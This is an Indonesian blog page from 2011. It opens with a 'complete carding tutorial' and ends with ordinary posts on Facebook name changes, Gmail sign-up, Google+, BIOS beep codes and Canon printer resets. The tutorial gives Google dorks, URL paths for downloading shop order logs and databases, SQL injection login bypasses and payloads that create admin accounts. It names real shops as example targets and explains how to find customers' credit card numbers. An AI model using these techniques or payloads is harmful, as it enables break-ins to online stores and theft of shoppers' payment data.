Cari Blog Ini

Memuat...

Jumat, 29 Juli 2011

TUTORIAL CARDING LENGKAP

Contoh bugs pada bentuk toko system : shopadmin


Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : www.Target.com/shopadmin.asp
user : 'or'1
pass : 'or'1



Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/...short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/...iles/order.log



Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/
Contoh target : www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : --> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb



Contoh bugs pada bentuk toko sistem CShop

Ketik keyword google.com : allinurl:/DCShop/
Contoh : www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt



Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/
Contoh : www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/.../cg-bin/esh...base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)




Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)



Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/
Contoh : www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer...ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer.../admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer...in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer...iles/order.log



Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-...xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-...RNS-001065.c32



Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :
http://Target.com/vpasp/shopdisplayp...39;a%25'--

Gantilah nilai dari string url terakhir dg:
: %20'a%25'--
: %20'b%25'--
: %20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya



Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp



Contoh bugs pada bentuk toko sistem : Lobby.asp


Ketik keyword google.com : allinurl: Lobby.asp
Contoh : www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : www.Target.com/fpdb/shop.mdb



Contoh bugs pada bentuk toko sistem : Shopper.cgi


Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop...dd=action&key=
Tambah dengan :...&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh...late=order.log



Contoh bugs pada bentuk toko sistem :Proddetail.asp


Ketik keyword google.com : allinurlroddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp...ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya : www.Target.org/fpdb/vsproducts.mdb




Contoh bugs pada bentuk toko sistem igishop


Ketik keyword google.com : inurl:"/cart.php?m="
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan -->admin
Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="

setelah bisa login, cari data yang diperlukan .



Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log
trus copy-paste tuch log'nya di notepad biar gampang di baca



Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya :'or"="
contoh target buat kalian :
https://www.therustybucket.biz/store/admin



Contoh bugs pada bentuk toko sistem : Index cart


Ketik keyword google.com : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces



Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain... cari target lain ok..??



Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro...prod=SL-IP0001
masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..



Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : "Powered by SunShop 3.2"
Atau google dork : inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik "OK" aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :'or''='



Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com
Ketik keyword google.com : "Powered by Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : 'or"="
Password : 'or"="
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin



Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik "convert databese" ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes....
sabar bro... masih di table customer no 36 then klik payment

Cara Hacker curi data Credit Card (carding)

Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain:

1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus.

2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, MSN), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno.

3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti www.clikbca.com, www.kikbca.com, dll, jadi kalau netter yang salah ketik, akan nyasar ke situs tersebut. Untungnya orang yang membuat situs tersebut katanya tidak bermaksud jahat. Nah kalau hacker carding yang buat tuh situs, siap-siap deh kartu kredit anda bakal jebol.

4. Menjebol situs e-commerce itu langsung dan mencuri semua data para pelanggannya. Cara ini agak sulit dan perlu pakar hacker atau hacker yang sudah pengalaman untuk melakukannya. Pada umumnya mereka memakai metode injection (memasukan script yang dapat dijalankan oleh situs/server) bagi situs yang memiliki firewall. Ada beberapa cara injection antara lain yang umum digunakan html injection dan SQL injection. Bagi situs yang tidak memiliki security atau firewall, siap-siaplah dikerjain abis-abisan.

Ada beberapa cara lagi yang dilakukan para hacker, tapi cara-cara di atas adalah cara yang paling umum dilakukan hacker untuk carding. Cara yang tidak umum akan dijelaskan nanti di lain waktu..

segala tindakan yang anda lakukan adalah beresiko , so Take your own risk,.....!!

Selasa, 26 Juli 2011

GANTI NAMA FB YG SUDAH MELEBIHI BATAS

Caranya: Ubah nama fb anda ke nama yg sblumnya

Contoh : Nama Sekarang : Genius Tok
Nama yg sebelumnya: Genius aja
nah ubah nama anda ke "Genius aja",. ini link ubah nama : https://www.facebook.com/settings?tab=account&section=name&t


(DAN MEMANG SEKARANG TIDAK BISA MENGANTINYA LANGSUNG SEPERTI DULU, , JADI HARUS DITULIS LAGI SAMA PERSIS DENGAN NAMA2 YG DULU PERNAH DI PAKAI)

Setelah berhasil mengubah ke nama sbelumnya sekrang buka : http://facebook.com/hacked

-Klik amankan akun

-buat password baru anda

-klik lanjutkan ceklis semua email anda

-klik lanjutkan ntar ada tlisan gnti nama

-klik Ganti Nama

-ya sudah gnti aja

-lalu klik lanjutkan Selesai deh


¤CARA GANTI NAMA SEPUASNYA Versi LAMA¤

Oke.!
langkah pertama kalau kamu menggunakan hp.

Lebih baik menggunakan opera mini.. Dengan tampilan fullsite {tampilan komputer}

=km masuk ke akun fb km

=kalau sudah masuk kamu tinggal
ganti nama kamu ke nama yg
dulu pernah kamu pakai atau
langsung klik PERBARUI
NAMA.
^

[ caranya km tinggal klik
>AKUN
>PENGATURAN AKUN
>GANTI NAMA ]

=kalo sudah silahkan anda masuk ke link ini>>

http://www.facebook.com/roadblock/roadblock_me.php?r=5

=lalu klik
>AMANKAN AKUN

>dan ikuti langkah demi langkah
dan lihatlah perbedaan pada
langkah KETIGA setelah LINK
GANTI TANGGAL LAHIR
^
[cONTOH: tanggal 02/mei/2009 (ganti)
lalu klik ganti]

=kalo sudah di ganti klik SIMPAN DAN LANJUTKAN
dan LINK GANTI NAMA KAMU
telah muncul.. ,Silahkan Ganti Nickname akun fb kamu yg baru dan hore nama baru
kamu berhasil.
Untuk mengganti nama sepuasnya kamu tinggal ulangi langkah di atas tanpa ganti tgl lahir
lagi.

<PERINGATAN>
sblum langkah2nya slesai jgn exit atau pindah ke branda/profile/dll

Minggu, 24 Juli 2011

Cara Membuat Gmail

  • Masuk ke http://gmail.com
  • Lalu klik bagian Sign Up atau tab Buat akun baru gmail .
gmail Cara Membuat Gmail
  • Kemudian isikan nama,password serta data data yang tercantum disitu ,lihat gambar
ddd Cara Membuat Gmail
  • Lalu setelah selesai klik tab bagian bawah yang bertuliskan “Saya menerima ,Buat akun saya”
ss Cara Membuat Gmail
  • Nah selanjutnya pada tahap ini anda akan disuruh verifikasi akun gmail anda menggunakan ponsel,masukkan no ponsel anda ,kemudian google akan mengirimkan nomer aktifasi untuk gmail anda.
  • Setelah terkirim masukkan kedalam kolom aktifasi gmail.
verifikasi Cara Membuat Gmail
verifikasi 2 Cara Membuat Gmail

  • Nah setelah terverifikasi anda berarti sudah selesai membuat akun gmail,selamat akun gmail telah terbuat dengan sempurna horeeee hehehe icon smile Cara Membuat Gmail
  • nah anda bisa menggunakan akun gmail untuk keperluan email atau mendaftar sesuatu di internet

Mengenal Google Plus – Google+

Kamu sudah mengenal Google Plus ..???situs jejaring social buatan google ini baru diluncurkan beberapa waktu lalu,nah mungkin bagi kamu yang ingin tau Cara Daftar Google Plus + Login bisa membaca tutorialnya di bawah ini .
Cara Daftar Google Plus + Login cukup mudah ,anda terlebih dahulu harus mempunyai email dari google terdahulu yakni gmail,untuk mendaftar Gmail anda bisa baca artikel saya di bawah ini, GEN berikan tutorial Cara Daftar Google Plus + seta Login Google Plus + icon biggrin Cara Daftar Google Plus + Login


google plus login Cara Daftar Google Plus + Login
  • Langkah selanjutnya adalah Klik Keep Me Posted lalu silahkan masukkan nama lengkap anda dan lainnya.
Terkadang ini ada yang error karena google plus masih membatasi penggunanya dan untuk mendaftar masuk harus di invite oleh teman yang sudah terdaftar,jadi untuk anda yang mengikuti langkah diatas namun masih error,tunggu saja waktunya google plus pasti bisa digunakan secara gratis .



Google Plus
adalah sebuah situs jejaring sosial yang baru yang dirilis oleh Google, dimana google+ memiliki kemampuan dan fungsi yang hampir sama seperti situs jejaring sosial seperti facebook dan friendster. Pada awalnya Google plus adalah sarana menambah teman pada sesama pemilik account di google, tetapi pada Selasa 4 Juli 2011 Google telah membuka google plus untuk publik sehingga orang2 dapat login secara langsung tanpa diundang lebih dulu dari seorang teman yang telah terdaftar di akun google plus.
Google+ dibuka untuk umum bertepatan pada Hari Kemerdekaan AS pada 4 Juli. Setelah situs google melepaskan secara umum google plus secara umum fitur invite dihentikan smentara, Alasannya, antusiasme masyarakat terlalu besar jauh di atas ekspektasi,padahal layanan Google plus ini masih beta.
google plus, google+
Google Plus dapat diakses dengan mengunjungi alamat website http://plus.google.com dan berikut adalah langkah-langkah untuk login google plus:
* Buat akun gmail sebagai e-mail Anda
* Atau Login menggunakan account Gmail Anda yang sudah dimiliki.
* Untuk calon pengguna yang belum memiliki account Gmail dapat mendaftar (sign up) sebelum memulai mendaftar atau login di account google plus.
Google plus diyakini menjadi pembunuh facebook dengan fitur tambahan dan fungsi dari jaringan sosial lainnya.
Berikut adalah beberapa fitur tambahan yang akan menjadi andalan google plus untuk mengalahkan beberapa situs jejaring sosial lainnya:
1. Hangouts (Nongkrong)
Ini adalah layanan konferensi lebih dari dua orang dengan panggilan video.
2. Sparks.
Fitur ini menghubungkan individu dalam jaringan ini untuk orang-orang yang memiliki minat yang sama terhadap sesuatu.
3. Huddles (Berkerumun)
Layanan ini menyediakan kelompok dalam jaringan ini untuk mengirim pesan instan.
4. Circle (Lingkaran)
Fungsi layanan untuk memasukkan nama teman-teman dalam kelompok dan pengguna dapat berbagi konten kepada teman-teman yang lain.
Hmm..apakah memang google+ akan bisa mengalahkan facebook dan twitter serta situs situs jejaring sosial lainnya, kita tunggu saja.

Kamis, 14 Juli 2011

Driver Modem Venus VT 12-18 for Windows XP / Vista / 7





Kabar gembira bagi pengguna modem Venus VT 12-18!!!




Selama ini driver bawaan modem Venus VT 12-18 hanya mendukung Windows XP & Windows Vista. Bagi pengguna Windows 7, apalagi yang 64 bit, hanya bisa "gigit jari" karena ternyata driver bawaan modem Venus VT 12-18 tidak bisa dipergunakan.

Ada beberapa pengguna Windows 7 yang dengan terpaksa melakukan downgrade (baca: menurunkan) OS (Operating System) mereka ke Windows Vista atau Windows XP bajakan karena alasan tersebut. Padahal rata-rata saat ini PC / Laptop yang dijual di pasaran sudah di-bundling dengan OS Windows 7 Original.

Kalau dihitung-hitung, harga Windows 7 yang paling murah adalah Rp 800.000 untuk versi Home Basic. Bagaimana dengan versi Professional hingga Ultimate-nya? Berapa banyak uang yang telah kita buang dengan mengganti bundling tersebut ke OS Windows bajakan? Dan seperti apa resiko yang akan kita hadapi jika menggunakan versi cracking yang biasanya disusupkan virus ke dalamnya?

Aaahhh... sudah dulu basa-basinya! Silahkan download langsung driver modem Venus VT 12-18 disini.

Info file:
size    : 765kb
format: 7Zip (bisa dibuka dgn Winrar)

Solusi Flashdisk Tidak Bisa Di Format




Tadi malam saya menerima servis flashdisk Kingston 1 Giga yang ngga mau diformat.
setiap kali flashdisk dicolokkan ke komputer selalu keluar tampilan window error dengan isi pesan please format.
Sudah saya coba menuruti isi pesan error untuk melakukan format flashdisk, namun tidak berhasil. semua seting yang ada seperti format Fat atau NTFS namun tetap sama hasilnya, setiap dibrowse di explorer selalu keluar pesan please format
Terakhir saya coba format dengan cara safe mode next….next…akhirnya flashdisk bisa digunakan kembali.
Bagaimana dengan datanya. Saya coba lalukan deep recovery berhasil mengangkat sebagian file yang ada. Namun separo file sudah pada rusak. Untungnya si pemilik ngga butuh datanya.
Ini salah satu tool untuk melakukan format FlashDisk
download disini
alternatif lain menggunakan syntax berikut bisa dicoba : Format [drive letter]: /X /FS:FAT32
Jika tetap tidak berhasil, silakan bawa ke bengkel saya ;)....hehehe.....

MENGATASI ACER ASPIRE ONE YANG TIBA-TIBA "Black Screen"



Bagi Anda yang memiliki Acer Aspire One (AA1) dan tiba-tiba layar AA1 anda ini hilang tidak menampilkan apapun tapi mesin AA1 masih hidup, maka hal ini karena AA1 anda minta di Recovery BIOS nya.

Meskipun sistem sudah tidak mau melakukan booting lagi pada AA1 anda, tapi sangat mungkin saat ini untuk melakukan Flash the BIOS. Tapi ini hanya untuk keadaan emergenci dan yang jelas ini akan menghilangkan status garansi anda, jadi jika anda melakukan hal ini tentunya segala resiko yang terjadi akan menjadi tanggung jawab anda.

Tapi jangan khawatir….pengalaman saya, asal anda melakukannya dengan hati-hati maka mudah-mudahan akan berhasil.
Ok…ikuti langkah berikut ini dengan hati-hati J

Pertama….Format USB Flash Disk Anda menjadi FAT

Kemudian download File BIOS terkini dan program Flash melalui link di bawah ini :


Ekstrak file rar tersebut kemudian copy kan seluruh file yang ada ke dalam flash disk anda

Langkah berikutnya :
Tancapkan Flashdisk pada AA1,
Matikan  AA1 anda, pastikan kalau baterai dan AC Adapter  terhubung, selanjutnya Tekan tombol Fn+Esc, dalam posisi tombol tsb tetap ditahan kemudian tekan Tombol Power untuk menghidupkan AA1 anda.
Selanjutnya lepas Tombol Fn+Esc, maka setelah beberapa detik Tombol Power akan berkedip. Kemudian tekan kembali Tombol Power sekali saja. Nah AA1 anda sedang memulai proses Flash BIOS, “”Jangan tunggu dengan Alasan Apapun proses tersebut” Setelah beberapa saat Tombol Power akan berhenti berkedip, dan AA1 anda akan segera Restart.

OK…. BIOS sudah selesai proses Flash nya dan semua setingan telah “Reset to Default”.

Jika karena alasan tertentu dan anda melakukan kesalahan selama prosedur sedang berlangsung, sehingga AA1 tidak ‘reboot’ maka tunggu selama 5 menit sebelum anda mematikan AA1 agar berjaga-jaga siapa tahu kondisi tersebut karena proses Flash BIOS masih berlangsung.


Selamat mencoba …..

Misteri Bunyi Beep Bios




Terdapat beberapa jenis model BIOS (Basic Input Output System) pada motherboard komputer anda. Pernahkah anda mendegar bunyi BEEP pada komputer sewaktu menghidupkan komputer? Jika pernah mendengar bunyi BEEP, bagaimana anda bisa menafsirkan bunyi BEEP tersebut maksudnya apa? Di bawah ini saya sertakan beberapa jenis model BIOS yang populer.

* Ami BIOS

1. Bunyi BEEP hanya sekali saja.
Kemungkinan RAM (Random Access Memory) ada masalah atau tidak terpasang dengan benar.

2. BEEP sebanyak enam kali
Kemungkinan keyboard komputer anda sudah rusak atau tidak terpasangkan dengan betul pada P/S2 port atau USB port.

3. BEEP sebanyak delapan kali
Kemungkinan VGA (Video Graphics Array) card atau graphic card komputer anda ada masalah atau tidak terpasang dengan benar.

4. BEEP sebanyak 11 kali
Checksum Error yaitu kemungkinan bateri CMOS komputer anda pada motherboard bermasalah atau habis. Coba Anda tukar bateri CMOS dengan yang baru jika mengalami masalah ini.

* Award BIOS

1) Bunyi BEEP yang panjang
Memori RAM pada komputer anda ada masalah atau tidak terpasang dengan benar.
2) 1 BEEP panjang dan 2 BEEP pendek
VGA Card atau Graphic Card ada masalah atau tidak terpasang dengan benar.

3) 1 BEEP panjang, 3 BEEP pendek
Kemungkinan keyboard komputer anda bermasalah atau tidak terpasang dengan benar pada P/S2 port atau USB port.

4) Bunyi BEEP yang panjang (contiuouns BEEP)
RAM atau VGA card komputer anda tidak dipasang dengan benar.

* Pheonix BIOS

1.) 1 BEEP, 1 BEEP dan 4 BEEP
Disebabkan BIOS komputer anda tidak berfungsi. Coba lakukan clear BIOS / CMOS.

2) 1 BEEP, 2 BEEP dan 1 BEEP
Disebabkan motherboard komputer anda yang sudah rusak.

3) 1 BEEP, 3 BEEP dan 1 BEEP
RAM komputer anda mungkin bermasalah atau tidak terpasang dengan benar.

4) 3 BEEP, 1 BEEP dan 1 BEEP
Disebabkan karena masalah motherboard komputer anda.

5) 3 BEEP, 3 BEEP dan 4 BEEP
VGA atau graphic card komputer anda bermasalah atau tidak terpasang dengan benar.

Rabu, 13 Juli 2011

MP Tool (Canon Resetter)

MP Tool v.0.9.2

mptool_screen.jpg
MP Tool versi 0.9.2 adalah software resetter untuk printer Canon type MPxx. Adapun type yang dapat direset oleh sofware ini adalah :
MP150, MP160, MP170, MP180, MP450, dan MP460
Berbeda dengan sofware resetter lainnya, sofware ini penggunaan sangat mudah.
Silahkan anda download dari situs resminya, yaitu:
Mungkin anda kesulitan, karena situs ini berbahasa Rusia. Tapi jangan kuatir, anda juga bisa download di sini:
http://www.box.net/shared/4yblbn34kg
Semoga bermanfaat …

Manual RESET buat Canon Monster Pack 140 series

Manual Reset Canon MP145 (Waste ink tank full)


Cara mereset printer Monster Pack 145 yg full tank / Waste ink tank full cukup mudah. Tidak perlu menggunakan software untuk merisetnya.
Biasanya di monitor display keluar kode E 27 atau E 5 .
Untuk mengatasinya adalah sebagai berikut :
Cara Reset Printer Canon MP145 dan MP160
Step 1 : Push Power switch by continue (Tekan Power On/Off)
Step 2 : inserrt plug(Masukan Power, Power Tetap di Tekan)
step 3 : Tekan Tombol Reset 1x, Tekan Reset dua kali lagi  Tanpa melepas tombol Power Sampai Menjadi 0 (tekan tombol tanpa jeda) Lalu Lepaskan Kedua tombol.
Step 4 : Push + display change from 0 to 1 (tekan tombol + untuk merubah 0 ke 1)
Step 5 : Push Power switch again , Printer will be print 1 page(tekan tombol power –> tombol start sampai ngeprint 1 hal.)
step 6 : Open cover (buka tutup printer)
Step 7 : Unplug (cabut kabel power)
Step 8 : Take out ink 40 and 41(lepaskan catridge 40 dan 41)
Step 9 : Insert plug again (pasang kabel power)
Step 10 : Push power switch (tekan tombol power)
Step 11 : Open cover (scan cover) (buka tutup scaner)
Step 12 : Inksert ink 40 , 41 again (masukan catridge 40 dan 41)
berikut ini resep ngereset waste ink counter (error E16 / E27) :
1. Matikan printer (kabel power masih tercolok), tekan dan tahan tombol STOP/RESET kemudian tekan tombol ON/OFF
2. Tahan tombol ON/OFF, tekan tombol STOP/RESET 2x
3. Lepaskan kedua tombol, tunggu sebentar dan printer akan masuk ke SERVICE MODE
4. Printer akan charging
5. Setelah printer selesai charging, tekan tombol STOP/RESET 4x. (Waste ink counter reset)
6. Setiap kali tombol STOP/RESET ditekan, lampu ON/OFF akan berubah warna hijau dan oranye
7. Sesudah itu Matikan printer dengan cara menekan tombol ON/OFF ( sebanyak 3 kali agar printer mati total ) dan cabut kabel POWER
8. Hidupkan kembali printer.
The number of the Reset : button pressing LED Function Remarks
0 time Green Power off
1 time Orange Service pattern print
2 times Green EEPROM print
3 times Orange EEPROM reset
4 times Green Waste ink counter reset
5) Unplug cable power. (for MP145 / MP150)
6) Turn Off Power. (for MP160)

Berikut tanda Error Code/Kode Error :

E2-2 = No paper (ASF)
E3-3 = Paper jam
E4 = No ink
E5-5 = The ink cartridges are not installed or a non-supported ink Cartridge is installed, or the ink cartridges are not installed properly
E8 = Waste ink absorber full, or platen waste ink absorber full
E9 = The connected digital camera / video camera does not support Camera Direct Printing
E14 = The Ink cartridges whose destination are wrong
E15 = Ink cartridge is not installed E16 – Ink remaining is unknown
E16 -E19 = Failed to scan head alignment sheet
E22 = Carriage error
E23 = Paper feed error
E24 = Purge unit error
E25 = ASF(cam) sensor error
E26 = Internal temperature rise error
E27 = Waste ink absorber full or platen waste ink absorber full
E28 = Ink cartridge temperature rise error -
E29 = EEPROM error
E33 = Paper feed position error
E35 15 = USB Host VBUD overcurrent error – USB
E37 17 = Abnormal motor driver error
E40 20 = Other hardware error
E42 22 = Scanner error
Selamat mencoba

Cara mereset printer Monster Pack 145 yg full tank / Waste ink tank full. Tidak perlu menggunakan software untuk meresetnya.

Biasanya di monitor display keluar kode E 27 atau E 5 .

Untuk mengatasinya adalah sebagai berikut :

Cara Reset Printer Canon MP145 dan MP160

Step 1 : Push Power switch by continue (Tekan Power On/Off)

Step 2 : insert plug(Masukan Power, Power Tetap di Tekan)

step 3 : Tekan Tombol Reset 1x, lepaskan Tombol Pwr, Tekan Reset dua kali lagi Sampai Menjadi 0 (tekan tombol tanpa jeda)

Step 4 : Push + display change from 0 to 1 (tekan tombol + untuk merubah 0 ke 1)

Step 5 : Push Power switch again , Printer will be print 1 page(tekan tombol power –> tombol start sampai ngeprint 1 hal.)

step 6 : Open cover (buka tutup printer)

Step 7 : Unplug (cabut kabel power)

Step 8 : Take out ink 40 and 41(lepaskan catridge 40 dan 41)

Step 9 : Insert plug again (pasang kabel power)

Step 10 : Push power switch (tekan tombol power)

Step 11 : Open cover (scan cover) (buka tutup scaner)

Step 12 : Inksert ink 40 , 41 again (masukan catridge 40 dan 41)

berikut ini resep ngereset waste ink counter (error E16 / E27) :

1. Matikan printer (kabel power masih tercolok), tekan dan tahan tombol STOP/RESET kemudian tekan tombol ON/OFF

2. Tahan tombol ON/OFF, tekan tombol STOP/RESET 2x

3. Lepaskan kedua tombol, tunggu sebentar dan printer akan masuk ke SERVICE MODE

4. Printer akan charging

5. Setelah printer selesai charging, tekan tombol STOP/RESET 4x. (Waste ink counter reset)

6. Setiap kali tombol STOP/RESET ditekan, lampu ON/OFF akan berubah warna hijau dan oranye

7. Sesudah itu Matikan printer dengan cara menekan tombol ON/OFF ( sebanyak 3 kali agar printer mati total ) dan cabut kabel POWER

8. Hidupkan kembali printer.

The number of the Reset : button pressing LED Function Remarks

0 time Green Power off

1 time Orange Service pattern print

2 times Green EEPROM print

3 times Orange EEPROM reset

4 times Green Waste ink counter reset

5) Unplug cable power. (for MP145 / MP150)

6) Turn Off Power. (for MP160)

Berikut tanda Error Code/Kode Error :

E2-2 = No paper (ASF)

E3-3 = Paper jam

E4 = No ink

E5-5 = The ink cartridges are not installed or a non-supported ink Cartridge is installed, or the ink cartridges are not installed properly

E8 = Waste ink absorber full, or platen waste ink absorber full

E9 = The connected digital camera / video camera does not support Camera Direct Printing

E14 = The Ink cartridges whose destination are wrong

E15 = Ink cartridge is not installed E16 – Ink remaining is unknown

E16 -E19 = Failed to scan head alignment sheet

E22 = Carriage error

E23 = Paper feed error

E24 = Purge unit error

E25 = ASF(cam) sensor error

E26 = Internal temperature rise error

E27 = Waste ink absorber full or platen waste ink absorber full

E28 = Ink cartridge temperature rise error -

E29 = EEPROM error

E33 = Paper feed position error

E35 15 = USB Host VBUD overcurrent error – USB

E37 17 = Abnormal motor driver error

E40 20 = Other hardware error

E42 22 = Scanner error



EPROM Reset Canon MP145

berikut ini adalah cara Reset EPROM untuk Canon MP145:

* Pasang kabel power ke socket listrik, tapi jangan hidupkan printernya dulu.
* Tekan dan tahan tombol Stop/Reset(dengan aikon segitiga terbalik warna merah).
* Tekan dan tahan tombol Power tanpa melepas tombol Stop/Reset(jadi sekarang dua tombol yang ditahan).
* Lepas tombol Stop/Reset tanpa melepas tombol Power.
